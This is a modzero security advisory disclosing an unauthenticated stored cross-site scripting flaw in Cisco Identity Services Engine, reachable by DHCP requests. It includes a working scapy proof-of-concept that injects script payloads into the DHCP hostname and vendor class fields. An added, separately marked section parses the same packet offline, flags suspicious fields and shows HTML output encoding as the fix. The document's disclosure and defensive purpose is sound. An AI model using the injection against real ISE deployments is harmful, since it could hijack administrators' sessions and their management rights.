
[MZ-19-03] Persistent XSS in CISCO ISE

ID: MZ-19-03

Release: February 19, 2020

Credits: Max Moser & Katharina Männle

----------------------------------------------------[MZ-19-03]----v1.2--

modzero Security Advisory:

Unauthenticated persistent cross-site scripting injection into the
administrative console of CISCO ISE web application via DHCP request

------------------------------------------------------------------------

------------------------------------------------------------------------

1. Timeline

------------------------------------------------------------------------

* 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com
* 2019-11-22: PSIRT opened case (PSIRT-0535851956)
* 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19'
* 2020-02-12: PSIRT incident manager confirmed reproducibility
* 2020-02-12: Received an unofficial CVE Number CVE-2020-3156
* 2020-02-19: modzero released advisory to the public

In  accordance  with  modzero's  disclosure  policy,  the  advisory  is
expected  to  be published  not  later than  February  21st, 2020.  Our
disclosure policy is available at:

https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf

------------------------------------------------------------------------

2. About

------------------------------------------------------------------------

Affected vendor: Cisco
Latest product versions known to be vulnerable:
    * Cisco Identity Services Engine version 2.6.0.156, Patch 2,3
      - Product Identifier: SNS-3655-K9
      - Version Identifier A0
      - ADE-OS Version 3.0.5.144

The Cisco Identity Services Engine is the engine behind Cisco's Network
Access Control  solution. It  enables the  creation and  enforcement of
security and access policies for endpoint devices connected to the
company's routers and switches.

------------------------------------------------------------------------

3. Details

------------------------------------------------------------------------

An unauthenticated attacker who is able to inject a specially crafted
DHCP request packet into a network controlled by Cisco Identity Services
Engine (ISE) can persistently store code (e.g. JavaScript) that is then
executed in the context of the Web browser accessing the Web-based
management interface.

The vulnerability is due to insufficient validation and encoding of the
attacker-controllable  input  within  the  hostname  and  vendor  class
identifier field of processed DHCP request packets.

The attacker-controlled code is executed in the context of the user who
is currently logged in to the Web-based management console, as soon as
that user reviews the affected endpoint's attribute details, i.e. opens
the following URL in the Identity Services Engine's Web-based management
interface:

https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails

------------------------------------------------------------------------

4. Impact

------------------------------------------------------------------------

The code will be executed with the rights of the user accessing the Web-
based management console. If the user has administrative rights, the
attacker might be able to leverage arbitrary functions of the Web-based
management interface.

------------------------------------------------------------------------

5. Proof of Concept exploit

------------------------------------------------------------------------

Using the following python script, two simple JavaScript code fragments
will be sent in the hostname and vendor class identifier fields of the
DHCP request.

#!/usr/bin/env python3
# Requires scapy and raw-socket privileges (run as root). Sends a single
# broadcast DHCPREQUEST whose hostname (option 12) and vendor class
# identifier (option 60) carry the script payloads.

from scapy.all import (Ether, IP, UDP, BOOTP, DHCP, conf,
                       get_if_raw_hwaddr, sendp)

conf.iface = "eth0"
hostname_payload = "<script>alert('hostname payload')</script>"
vendor_class_id_payload = "<script>alert('v class id payload')</script>"

# raw 6-byte MAC of the sending interface, reused as the BOOTP chaddr
_, hw = get_if_raw_hwaddr(conf.iface)
ethernet = Ether(dst="ff:ff:ff:ff:ff:ff", src=hw, type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
bootp = BOOTP(op=1, chaddr=hw)          # op=1: BOOTREQUEST
dhcp = DHCP(options=[("message-type", "request"),
                     ("hostname", hostname_payload),
                     ("vendor_class_id", vendor_class_id_payload),
                     "end"])

packet = ethernet / ip / udp / bootp / dhcp
sendp(packet, iface=conf.iface)

Once a user reviews the attributes of the sending endpoint within the
ISE Web-based management interface, the injected code is executed.
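The following added example is not part of the advisory and is neither modzero's nor Cisco's code; it ties sections 3 and 5 together. Using only the Python standard library, it builds the same DHCP request payload the scapy PoC above sends, parses the options back out the way a receiving service such as ISE would have to (including pad, end and truncated options), flags the free-text options that carry HTML metacharacters, and places the two rendering helpers side by side: the verbatim insertion the advisory describes and the output-encoded form that neutralizes it. The packet construction, the flagging regex and the `render_unsafe`/`render_safe` helpers are assumptions made for illustration, not ISE's implementation; nothing is sent on the network.

```python
#!/usr/bin/env python3
"""Added example (not modzero's or Cisco's code): build the DHCP request
from the advisory's PoC offline, parse its options, flag the attacker-
controlled free-text fields and show the missing encoding step."""
import html
import re
import struct

# DHCP option codes used below (RFC 2132)
OPT_MSG_TYPE = 53
OPT_HOSTNAME = 12
OPT_VENDOR_CLASS = 60
OPT_END = 255
DHCPREQUEST = 3
MAGIC_COOKIE = b"\x63\x82\x53\x63"

# Payloads taken from the advisory's PoC script
HOSTNAME_PAYLOAD = "<script>alert('hostname payload')</script>"
VENDOR_CLASS_PAYLOAD = "<script>alert('v class id payload')</script>"


def build_dhcp_request(chaddr: bytes, options: list) -> bytes:
    """Constructed BOOTP/DHCP payload (UDP body only): the fixed 236-byte
    BOOTP header, the magic cookie, then TLV options and an END marker."""
    # op=1 (BOOTREQUEST), htype=1 (Ethernet), hlen=6, hops=0, xid,
    # secs=0, flags=0x8000 (broadcast), ciaddr/yiaddr/siaddr/giaddr=0
    header = struct.pack("!BBBBIHHIIII", 1, 1, 6, 0, 0x3903F326,
                         0, 0x8000, 0, 0, 0, 0)
    header += chaddr.ljust(16, b"\x00")   # chaddr, padded to 16 bytes
    header += b"\x00" * 64 + b"\x00" * 128  # sname, file
    body = MAGIC_COOKIE
    for code, value in options:
        body += bytes([code, len(value)]) + value
    return header + body + bytes([OPT_END])


def parse_dhcp_options(payload: bytes) -> dict:
    """Parse the options block into {code: raw bytes}. Handles pad (0) and
    end (255) and rejects options that run past the end of the packet."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP payload")
    opts = {}
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == 0:            # pad option has no length byte
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d runs past end of packet" % code)
        opts[code] = value
        i += 2 + length
    return opts


# Assumed heuristic: characters that can change HTML structure, plus the
# most common inline-script vectors.
SUSPICIOUS = re.compile(r"[<>\"'&]|javascript:|on\w+\s*=", re.IGNORECASE)


def suspicious_dhcp_fields(payload: bytes) -> dict:
    """Return {field_name: text} for hostname / vendor class identifier
    values containing HTML or JavaScript metacharacters. Bytes are decoded
    with replacement so malformed input cannot crash the check."""
    opts = parse_dhcp_options(payload)
    hits = {}
    for code, name in ((OPT_HOSTNAME, "hostname"),
                       (OPT_VENDOR_CLASS, "vendor_class_id")):
        if code in opts:
            text = opts[code].decode("utf-8", "replace")
            if SUSPICIOUS.search(text):
                hits[name] = text
    return hits


def render_unsafe(label: str, value: str) -> str:
    """The failure the advisory describes: endpoint attribute inserted
    into the page verbatim, so a stored <script> tag becomes live markup."""
    return "<td>%s</td><td>%s</td>" % (label, value)


def render_safe(label: str, value: str) -> str:
    """Context-aware output encoding for an HTML text node: every character
    that could open a tag or attribute is escaped, so the browser shows the
    payload as inert text."""
    return "<td>%s</td><td>%s</td>" % (html.escape(label, quote=True),
                                         html.escape(value, quote=True))


if __name__ == "__main__":
    pkt = build_dhcp_request(bytes.fromhex("0a0000000001"), [
        (OPT_MSG_TYPE, bytes([DHCPREQUEST])),
        (OPT_HOSTNAME, HOSTNAME_PAYLOAD.encode()),
        (OPT_VENDOR_CLASS, VENDOR_CLASS_PAYLOAD.encode()),
    ])
    for name, value in suspicious_dhcp_fields(pkt).items():
        print("flagged %s: %r" % (name, value))
        print("  unsafe:", render_unsafe(name, value))
        print("  safe:  ", render_safe(name, value))
```

The flagging regex is a monitoring aid for a DHCP listener or a pcap review, not a substitute for the fix: the durable control is the `render_safe` step (encode on output for the HTML context the value lands in), because hostname and vendor class identifier are free-form fields that legitimately contain characters a blacklist would have to allow.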

------------------------------------------------------------------------

6. Workaround

------------------------------------------------------------------------

-

------------------------------------------------------------------------

7. Fix

------------------------------------------------------------------------

No software updates are available yet.

------------------------------------------------------------------------

8. Credits

------------------------------------------------------------------------

 * Max Moser
 * Katharina Maennle

------------------------------------------------------------------------

9. About modzero

------------------------------------------------------------------------

The independent company modzero assists clients with security  analysis
in  the  complex areas   of  computer technology.  The  focus  lies  on
highly   detailed   technical  analysis   of   concepts,  software  and
hardware  components  as  well   as  the  development  of    individual
solutions.  Colleagues   at modzero  work   exclusively in   practical,
highly technical computer-security areas and can draw on decades of
experience in various platforms, system concepts, and designs.

Website: https://www.modzero.ch
E-Mail: contact@modzero.ch

------------------------------------------------------------------------

10. Disclaimer

------------------------------------------------------------------------

The information in the advisory is believed to be accurate at the time
of publishing  based on  currently available  information. Use  of the
information  constitutes acceptance  for use  in an  AS IS  condition.
There are no warranties with  regard to this information. Neither  the
author  nor  the  publisher  accepts  any  liability  for  any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
